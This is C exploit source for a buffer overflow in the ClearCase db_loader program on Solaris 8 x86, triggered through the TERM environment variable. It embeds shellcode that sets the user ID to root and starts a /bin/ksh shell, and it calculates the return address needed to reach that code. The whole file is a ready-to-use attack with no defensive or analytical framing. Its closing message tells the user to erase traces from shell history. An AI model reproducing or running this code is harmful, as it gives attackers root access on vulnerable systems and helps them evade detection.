/* Exploit code for ClearCase db_loader $TERM overflow on Solaris x86 Test on Solaris 8 x86. By virtualcat@xfocus.org */ /* You may need to modify this macro accordingly with your system */ #define EXECUTABLE "/usr/atria/sol_x86/etc/db_loader" //#define EXECUTABLE "db_loader" #define MAGIC_STRING "TERM=" #define BUF_LEN 559 #define USER_UPPER 0x8047fff // Solaris 8 x86's magic /* Buffer will be constructed as the following +-----+-----------+----------------+---------+ |TERM=||0x410x41....0x41|| +-----+-----------+----------------+---------+ ^ | |________________________________| */ /* lsd's shellcode */ char shellCode[] = "\x33\xc0" /* xorl %eax,%eax */ "\xeb\x08" /* jmp */ "\x5f" /* popl %edi */ "\x47" /* incl %edi */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x47\x01" /* movb %al,0x1(%edi) */ "\xeb\x0d" /* jmp */ "\xe8\xf3\xff\xff\xff" /* call */ "\x9a\xff\xff\xff\xff" "\x07\xff" "\xc3" /* ret */ "\x33\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17,%al */ "\xe8\xee\xff\xff\xff" /* call */ "\xeb\x16" /* jmp */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x7(%edx) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xe8\xd6\xff\xff\xff" /* call */ "\xe8\xe5\xff\xff\xff" /* call */ "/bin/ksh"; int main(int argc, char** argv) { char* envp[2]; char* charPtr = 0; char* bufPtr = 0; int len; int retAddr; bufPtr = (char *) malloc(BUF_LEN+1); if(bufPtr != 0) { strcat(bufPtr, MAGIC_STRING); charPtr = bufPtr + strlen(MAGIC_STRING); for(len=0; len < strlen(shellCode); len++) { *charPtr++ = shellCode[len]; } memset(charPtr, 0x41, BUF_LEN - strlen(MAGIC_STRING) - strlen(shellCode)); len = 8 // Length of the dummy argv0 "1234567" + 1 + BUF_LEN + 1 // Length of the TERM environment variable buffer + 1 + 6 // Length of "i86pc" + 1 + strlen(EXECUTABLE)+1; // Length of the path of the executable retAddr = USER_UPPER // Solaris x86's magic - 4 // Reserved bytes - always be 0 - ((len%4) == 0 ? len:len+(4-len%4)) // The 4 bytes alignment + 8 // Space for argv0 "1234567" + 5 // Space for "TERM=" + 1; // One byte ajustment *((int *) (bufPtr + BUF_LEN - 4)) = retAddr; *(bufPtr + BUF_LEN + 1) = 0; envp[0] = bufPtr; envp[1] = 0; printf("Jumping to 0x%.8x ... \n", retAddr); printf("Don't forget to clean your foot steps in /.sh_history. Have fun! ;)\n"); execle(EXECUTABLE, "1234567", 0, envp); perror("execle"); } else { printf("No more free memory!\n"); } return 0; }